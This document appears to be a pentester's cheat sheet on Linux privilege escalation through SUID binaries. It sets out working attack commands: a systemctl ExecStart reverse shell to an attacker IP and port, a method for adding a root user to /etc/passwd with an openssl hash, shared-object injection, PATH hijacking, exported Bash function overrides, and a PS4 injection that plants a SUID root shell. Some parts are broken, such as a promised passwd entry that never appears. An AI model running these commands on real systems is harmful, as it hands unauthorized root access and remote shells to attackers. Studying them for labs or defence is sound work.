Using files with SUID/SGID permission set

Most common type of privilege escalation techniqu

What is SUID?

Set owner User ID, also known as Set user ID or setuid is a special flag in Linux permission set.

Find files with SUID set

find / -user root -perm -4000 -exec ls -ldb {} \;
find / -perm -u=s -type f 2>/dev/null
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

Exploiting systemctl

Reverse shell to root user

ExecStart=/bin/bash -c "bash -i >& /dev/tcp/<IP ADDRESS>/<PORT> 0>&1"

Modifying /etc/passwd with write access

With a user that has write access to /etc/passwd file, we can add a new user credentials and gain root user access.

  • Generate a new password hash using the username as salt, here we are going to use new as a salt and 123 as our password.

openssl passwd -1 -salt new 123
  • Next copy the hash generated, change the following entry and enter it into the /etc/passwd file's end. Remember to change new with your selected username.

  • Now we use the following command and supply our password to gain root access.

su new   

Shared Object Injection

When a program executes it will try to load the shared objects it requires from a specific path. If we can write to that directory/path the program tries to open then we can have a root shell spawned by a malicious shared object file (.so file).

After finding a SUID binary we can run strace on the file and search the output for open/access calls and for "no such file" errors:

strace <full path to file> 2>&1 | grep -iE "open|access|no such file"
strace -v -f -e execve <command> 2>&1 | grep exec 

The ldd and readelf commands can also be useed as follows:

ldd $(which <suid binary>)
readelf $(which <suid binary>)

The strings command can also be used to find the shared object names being used by a file.

strings /path/to/file

The ltrace command is a Linux debugging tool that displays calls made to shared libraries and system calls.

ltrace <command>

Compiling a new shared object syntax

gcc -shared -fPIC -o /path/to/original/ /path/to/code.c

Abusing PATH environment variable

The PATH environment variable contains a list of directories where a shell should find programs.

In case a program tries to execute another program but only specifies the name of the latter instead of the full path, the shell looks for it in the PATH directories until it's found.

Since the PATH variable is under user's control it can be modified so that the shell makes the program call the new malicious binary in a usser specified directory.

Find Vulnerable Programs

strace -v -f -e execve <command> 2>&1 | grep exec
strings /path/to/file
ltrace <command>

After fining the program being called with relative path instead of the full path value, we can create prepend the directory in which we have our vulnerable executable to the PATH variable and call the program.

For Eg: let's say a program /usr/bin/start is a SUID file and has a line service apache2 start which we find by running strings on it. Since the service command is being called directly instead of it's full path (eg: /usr/bin/service). We can create a new vulnerable service command in a writeable directory, prepend the current directory to the PATH variable and call the start binary to get a root shell.

user@kali$ PATH=.:$PATH /usr/bin/start

Abusing shell features

In Bash versions < 4.2-048 it is possible to define shell functions with names that resemble file paths, then export those functions so that they are used instead of any actual executable at that file path.

Shell features can useful in cases where PATH environment variable cannot be exploited. In situations where a binary using absolute path for calling a command/service/binary, shell features can be useful.

For Eg: let's say a program /usr/bin/start is a SUID file and has a line /usr/bin/service apache2 start which we find by running strings on it. We can create a Bash function with the name "/usr/bin/service" that executes a new Bash shell (using -p so permissions are preserved) and export the function:

function /usr/bin/service { /bin/bash -p; }
export -f /usr/bin/service

Now when /usr/bin/start is called we get a root shell.

In Bash versions < 4.4, when in debugging mode, Bash uses the environment variable PS4 to display an extra prompt for debugging statements.

For Eg: let's say a program /usr/bin/start is a SUID file and has a line /usr/bin/service apache2 start which we find by running strings on it. We can run the /usr/bin/start executable with bash debugging enabled and the PS4 variable set to an embedded command which creates an SUID version of /bin/bash:

user@kali$ env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' /usr/bin/start

Run the /tmp/rootbash executable with -p to gain a shell running with root privileges:

user@kali$ /tmp/rootbash -p

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